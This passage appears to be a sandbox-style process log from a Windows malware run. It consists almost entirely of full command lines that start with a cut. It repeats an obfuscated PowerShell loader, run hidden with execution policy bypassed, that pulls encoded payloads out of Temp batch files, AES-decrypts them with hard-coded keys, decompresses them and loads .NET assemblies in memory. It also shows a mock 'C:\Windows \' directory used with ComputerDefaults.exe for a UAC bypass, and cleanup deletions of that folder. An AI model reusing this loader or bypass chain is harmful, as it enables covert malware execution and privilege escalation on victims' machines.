$JXFgn.CopyTo($dMvJM); $JXFgn.Dispose(); $anPTb.Dispose(); $dMvJM.Dispose(); $dMvJM.ToArray();}function execute_function($param_var,$param2_var){ $GfJaX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aDspK=$GfJaX.EntryPoint; $aDspK.Invoke($null, $param2_var);}$uyftC = 'C:\Users\Admin\AppData\Local\Temp\Ready.bat';$host.UI.RawUI.WindowTitle = $uyftC;$JWePL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uyftC).Split([Environment]::NewLine);foreach ($ynrHu in $JWePL) { if ($ynrHu.StartsWith('hcYJWCkzLwgEbRimAuGK')) { $ygbIC=$ynrHu.Substring(20); break; }}$payloads_var=[string[]]$ygbIC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"

C:\Windows \System32\ComputerDefaults.exe

"C:\Windows \System32\ComputerDefaults.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c call SC.cmd

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7pfv3IC7ad/h9x9L+91yRp6AnehvA4v4FJcPUx3O2HY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X+cU4l/F7fG8+16o5SCDLA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IlaQt=New-Object System.IO.MemoryStream(,$param_var); $Ybcnm=New-Object System.IO.MemoryStream; $Evfbh=New-Object System.IO.Compression.GZipStream($IlaQt, [IO.Compression.CompressionMode]::Decompress); $Evfbh.CopyTo($Ybcnm); $Evfbh.Dispose(); $IlaQt.Dispose(); $Ybcnm.Dispose(); $Ybcnm.ToArray();}function execute_function($param_var,$param2_var){ $QSfby=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSQnj=$QSfby.EntryPoint; $TSQnj.Invoke($null, $param2_var);}$kvOlG = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $kvOlG;$pTJta=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kvOlG).Split([Environment]::NewLine);foreach ($oFaKJ in $pTJta) { if ($oFaKJ.StartsWith('ZkqIwJCzcVBaEdxxLCQj')) { $xIiOP=$oFaKJ.Substring(20); break; }}$payloads_var=[string[]]$xIiOP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Zero.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Lion.bat" "

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZPwGCBOvjNusELqY76pxZya0Lxj9wUHStDWXWQq3VFQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ikdb8NRfiUQc/X8n0b8K3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $husQJ=New-Object System.IO.MemoryStream(,$param_var); $fctrX=New-Object System.IO.MemoryStream; $IaCEh=New-Object System.IO.Compression.GZipStream($husQJ, [IO.Compression.CompressionMode]::Decompress); $IaCEh.CopyTo($fctrX); $IaCEh.Dispose(); $husQJ.Dispose(); $fctrX.Dispose(); $fctrX.ToArray();}function execute_function($param_var,$param2_var){ $cGlFM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SXWwD=$cGlFM.EntryPoint; $SXWwD.Invoke($null, $param2_var);}$YwUMr = 'C:\Users\Admin\AppData\Local\Temp\Zero.bat';$host.UI.RawUI.WindowTitle = $YwUMr;$WBMie=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YwUMr).Split([Environment]::NewLine);foreach ($yUchE in $WBMie) { if ($yUchE.StartsWith('eVpVeEttJiyVxTcVIRdA')) { $wGYAw=$yUchE.Substring(20); break; }}$payloads_var=[string[]]$wGYAw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1YnbLPNeUNVUVVxywIOo7MRePVU0zkaX0wmvOUU+5JI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O1ZS4QT3iZbBumFZuklvIw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NszaK=New-Object System.IO.MemoryStream(,$param_var); $XeHtF=New-Object System.IO.MemoryStream; $IjqXl=New-Object System.IO.Compression.GZipStream($NszaK, [IO.Compression.CompressionMode]::Decompress); $IjqXl.CopyTo($XeHtF); $IjqXl.Dispose(); $NszaK.Dispose(); $XeHtF.Dispose(); $XeHtF.ToArray();}function execute_function($param_var,$param2_var){ $qIrXR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSbzU=$qIrXR.EntryPoint; $TSbzU.Invoke($null, $param2_var);}$DsdCu = 'C:\Users\Admin\AppData\Local\Temp\Lion.bat';$host.UI.RawUI.WindowTitle = $DsdCu;$ogPYs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DsdCu).Split([Environment]::NewLine);foreach ($EVBrb in $ogPYs) { if ($EVBrb.StartsWith('amSrAwxpqNlmSpytGMiD')) { $WsuQP=$EVBrb.Substring(20); break; }}$payloads_var=[string[]]$WsuQP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"

C:\Windows \System32\ComputerDefaults.exe

"C:\Windows \System32\ComputerDefaults.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c call SC.cmd

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Crypt.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ready.bat" "

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZPwGCBOvjNusELqY76pxZya0Lxj9wUHStDWXWQq3VFQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ikdb8NRfiUQc/X8n0b8K3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $husQJ=New-Object System.IO.MemoryStream(,$param_var); $fctrX=New-Object System.IO.MemoryStream; $IaCEh=New-Object System.IO.Compression.GZipStream($husQJ, [IO.Compression.CompressionMode]::Decompress); $IaCEh.CopyTo($fctrX); $IaCEh.Dispose(); $husQJ.Dispose(); $fctrX.Dispose(); $fctrX.ToArray();}function execute_function($param_var,$param2_var){ $cGlFM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SXWwD=$cGlFM.EntryPoint; $SXWwD.Invoke($null, $param2_var);}$YwUMr = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $YwUMr;$WBMie=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YwUMr).Split([Environment]::NewLine);foreach ($yUchE in $WBMie) { if ($yUchE.StartsWith('eVpVeEttJiyVxTcVIRdA')) { $wGYAw=$yUchE.Substring(20); break; }}$payloads_var=[string[]]$wGYAw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7pfv3IC7ad/h9x9L+91yRp6AnehvA4v4FJcPUx3O2HY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X+cU4l/F7fG8+16o5SCDLA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IlaQt=New-Object System.IO.MemoryStream(,$param_var); $Ybcnm=New-Object System.IO.MemoryStream; $Evfbh=New-Object System.IO.Compression.GZipStream($IlaQt, [IO.Compression.CompressionMode]::Decompress); $Evfbh.CopyTo($Ybcnm); $Evfbh.Dispose(); $IlaQt.Dispose(); $Ybcnm.Dispose(); $Ybcnm.ToArray();}function execute_function($param_var,$param2_var){ $QSfby=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSQnj=$QSfby.EntryPoint; $TSQnj.Invoke($null, $param2_var);}$kvOlG = 'C:\Users\Admin\AppData\Local\Temp\Crypt.bat';$host.UI.RawUI.WindowTitle = $kvOlG;$pTJta=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kvOlG).Split([Environment]::NewLine);foreach ($oFaKJ in $pTJta) { if ($oFaKJ.StartsWith('ZkqIwJCzcVBaEdxxLCQj')) { $xIiOP=$oFaKJ.Substring(20); break; }}$payloads_var=[string[]]$xIiOP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e8muxl44QzFpbnkCrjQK7MgY3wLigHlewOA/sTi7P3M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xIHx7sG5Sgt6SDumHCsJWA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $anPTb=New-Object System.IO.MemoryStream(,$param_var); $dMvJM=New-Object System.IO.MemoryStream; $JXFgn=New-Object System.IO.Compression.GZipStream($anPTb, [IO.Compression.CompressionMode]::Decompress); $JXFgn.CopyTo($dMvJM); $JXFgn.Dispose(); $anPTb.Dispose(); $dMvJM.Dispose(); $dMvJM.ToArray();}function execute_function($param_var,$param2_var){ $GfJaX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aDspK=$GfJaX.EntryPoint; $aDspK.Invoke($null, $param2_var);}$uyftC = 'C:\Users\Admin\AppData\Local\Temp\Ready.bat';$host.UI.RawUI.WindowTitle = $uyftC;$JWePL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uyftC).Split([Environment]::NewLine);foreach ($ynrHu in $JWePL) { if ($ynrHu.StartsWith('hcYJWCkzLwgEbRimAuGK')) { $ygbIC=$ynrHu.Substring(20); break; }}$payloads_var=[string[]]$ygbIC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"

C:\Windows \System32\ComputerDefaults.exe

"C:\Windows \System32\ComputerDefaults.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c call SC.cmd

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e8muxl44QzFpbnkCrjQK7MgY3wLigHlewOA/sTi7P3M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xIHx7sG5Sgt6SDumHCsJWA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $anPTb=New-Object System.IO.MemoryStream(,$param_var); $dMvJM=New-Object System.IO.MemoryStream; $JXFgn=New-Object System.IO.Compression.GZipStream($anPTb, [IO.Compression.CompressionMode]::Decompress); $JXFgn.CopyTo($dMvJM); $JXFgn.Dispose(); $anPTb.Dispose(); $dMvJM.Dispose(); $dMvJM.ToArray();}function execute_function($param_var,$param2_var){ $GfJaX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aDspK=$GfJaX.EntryPoint; $aDspK.Invoke($null, $param2_var);}$uyftC = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $uyftC;$JWePL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uyftC).Split([Environment]::NewLine);foreach ($ynrHu in $JWePL) { if ($ynrHu.StartsWith('hcYJWCkzLwgEbRimAuGK')) { $ygbIC=$ynrHu.Substring(20); break; }}$payloads_var=[string[]]$ygbIC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Zero.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Lion.bat" "

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZPwGCBOvjNusELqY76pxZya0Lxj9wUHStDWXWQq3VFQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ikdb8NRfiUQc/X8n0b8K3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $husQJ=New-Object System.IO.MemoryStream(,$param_var); $fctrX=New-Object System.IO.MemoryStream; $IaCEh=New-Object System.IO.Compression.GZipStream($husQJ, [IO.Compression.CompressionMode]::Decompress); $IaCEh.CopyTo($fctrX); $IaCEh.Dispose(); $husQJ.Dispose(); $fctrX.Dispose(); $fctrX.ToArray();}function execute_function($param_var,$param2_var){ $cGlFM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SXWwD=$cGlFM.EntryPoint; $SXWwD.Invoke($null, $param2_var);}$YwUMr = 'C:\Users\Admin\AppData\Local\Temp\Zero.bat';$host.UI.RawUI.WindowTitle = $YwUMr;$WBMie=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YwUMr).Split([Environment]::NewLine);foreach ($yUchE in $WBMie) { if ($yUchE.StartsWith('eVpVeEttJiyVxTcVIRdA')) { $wGYAw=$yUchE.Substring(20); break; }}$payloads_var=[string[]]$wGYAw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1YnbLPNeUNVUVVxywIOo7MRePVU0zkaX0wmvOUU+5JI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O1ZS4QT3iZbBumFZuklvIw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NszaK=New-Object System.IO.MemoryStream(,$param_var); $XeHtF=New-Object System.IO.MemoryStream; $IjqXl=New-Object System.IO.Compression.GZipStream($NszaK, [IO.Compression.CompressionMode]::Decompress); $IjqXl.CopyTo($XeHtF); $IjqXl.Dispose(); $NszaK.Dispose(); $XeHtF.Dispose(); $XeHtF.ToArray();}function execute_function($param_var,$param2_var){ $qIrXR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSbzU=$qIrXR.EntryPoint; $TSbzU.Invoke($null, $param2_var);}$DsdCu = 'C:\Users\Admin\AppData\Local\Temp\Lion.bat';$host.UI.RawUI.WindowTitle = $DsdCu;$ogPYs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DsdCu).Split([Environment]::NewLine);foreach ($EVBrb in $ogPYs) { if ($EVBrb.StartsWith('amSrAwxpqNlmSpytGMiD')) { $WsuQP=$EVBrb.Substring(20); break; }}$payloads_var=[string[]]$WsuQP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"

C:\Windows \System32\ComputerDefaults.exe

"C:\Windows \System32\ComputerDefaults.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c call SC.cmd

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZPwGCBOvjNusELqY76pxZya0Lxj9wUHStDWXWQq3VFQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ikdb8NRfiUQc/X8n0b8K3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $husQJ=New-Object System.IO.MemoryStream(,$param_var); $fctrX=New-Object System.IO.MemoryStream; $IaCEh=New-Object System.IO.Compression.GZipStream($husQJ, [IO.Compression.CompressionMode]::Decompress); $IaCEh.CopyTo($fctrX); $IaCEh.Dispose(); $husQJ.Dispose(); $fctrX.Dispose(); $fctrX.ToArray();}function execute_function($param_var,$param2_var){ $cGlFM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SXWwD=$cGlFM.EntryPoint; $SXWwD.Invoke($null, $param2_var);}$YwUMr = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $YwUMr;$WBMie=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YwUMr).Split([Environment]::NewLine);foreach ($yUchE in $WBMie) { if ($yUchE.StartsWith('eVpVeEttJiyVxTcVIRdA')) { $wGYAw=$yUchE.Substring(20); break; }}$payloads_var=[string[]]$wGYAw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Zero.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Lion.bat" "

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

